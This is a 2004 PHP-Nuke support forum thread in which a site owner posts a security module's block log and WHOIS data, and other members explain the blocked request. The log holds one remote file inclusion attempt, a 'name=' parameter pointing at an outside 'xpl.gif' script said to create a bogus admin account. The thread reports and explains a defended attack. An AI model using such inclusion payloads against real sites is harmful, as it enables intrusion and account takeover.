PHP Web Host - Quality Web Hosting For All PHP Applications Just Great Software
  Login or Register
 • Home • Downloads • Your Account • Forums • 

View next topic
View previous topic


Google
 
Web RavenPHPScripts (This Site)
Post new topic   Reply to topic
Author Message
digibeet
Regular
Regular


Joined: Jul 08, 2004
Posts: 96
Location: Amsterdam, the Netherlands

PostPosted: Sun Jul 25, 2004 7:02 am Reply with quote Back to top

A.I. asked me post this so..

Datum & Tijd: 2004-07-25 06:49:24
Geblokkeerd IP: 200.184.48.252
Gebruikers ID: Anonymous (1)
Reden: Misbruik - ANDERS
--------------------
Gebruiks Agent: none
Query String: ************/modules.php?name=http://dcha0s.tripod.com.br/xpl.gif?
Doorgestuurd Voor: none
Client IP: none
Remote Adres: 200.184.48.252
Remote Poort: 3554
Aanvraag Methode: GET
--------------------
Who-Is voor IP
200.184.48.252




OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY

ReferralServer:
Only registered users can see links on this board!
Get registered or login to the forums!


NetRange: 200.0.0.0 - 200.255.255.255
CIDR: 200.0.0.0/8
NetName: LACNIC-200
NetHandle: NET-200-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
NameServer: NS2.DNS.BR
Comment: This IP address range is under LACNIC responsibility for further
Comment: allocations to users in LACNIC region.
Comment: Please see
Only registered users can see links on this board!
Get registered or login to the forums!
for further details, or check the
Comment: WHOIS server located at whois.lacnic.net
RegDate: 2002-07-27
Updated: 2004-03-18

TechHandle: LACNIC-ARIN
TechName: LACNIC Hostmaster
TechPhone: (+55) 11 5509-3522
TechEmail:
Only registered users can see links on this board!
Get registered or login to the forums!


OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3522
OrgTechEmail:
Only registered users can see links on this board!
Get registered or login to the forums!


Ideas.. anybody?

Thanks,


Fred Twisted Evil
View user's profile Send private message Visit poster's website
sixonetonoffun
Spouse Contemplates Divorce


Joined: Jan 02, 2003
Posts: 2499

PostPosted: Sun Jul 25, 2004 9:08 am Reply with quote Back to top

name=http:// is what it triggered on. The gif? is likely a script I didn't check it out but theres some floating around that mimick a remote linked image but actually try to create a bogus admin account.
View user's profile Send private message
BobMarion
Former Admin in Good Standing


Joined: Oct 30, 2002
Posts: 1043
Location: RedNeck Land (known as Kentucky)

PostPosted: Sun Jul 25, 2004 9:35 am Reply with quote Back to top

You will also notice that the IP is a Brazilian IP which is known for using this very same attack on many sites. I get this report many times a day from all over Brazil.
View user's profile Send private message Send e-mail Visit poster's website
digibeet
Regular
Regular


Joined: Jul 08, 2004
Posts: 96
Location: Amsterdam, the Netherlands

PostPosted: Sun Jul 25, 2004 10:29 am Reply with quote Back to top

Dind't know that, it whas the first time for me Very Happy

Thanks Bob,

Fred Mr. Green
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
Forums ©
 

All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2011 by Raven

You can syndicate our news using the file xml

CSE HTML Validator Helped Clean up This Page! [Valid RSS] valid RSS 2.0 Valid robots.txt Stop Spam Harvesters, Join Project Honey Pot

Website engines core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is a free software released under the GNU/GPL.


:: fisubice phpbb2 style by Daz :: PHP-Nuke theme by www.nukemods.com ::
:: fisubice Theme Modified by the RavenNuke™ Team ::

:: W3C CSS Compliance Validation :: W3C HTML 4.01 Transitional Compliance Validation ::

zerosum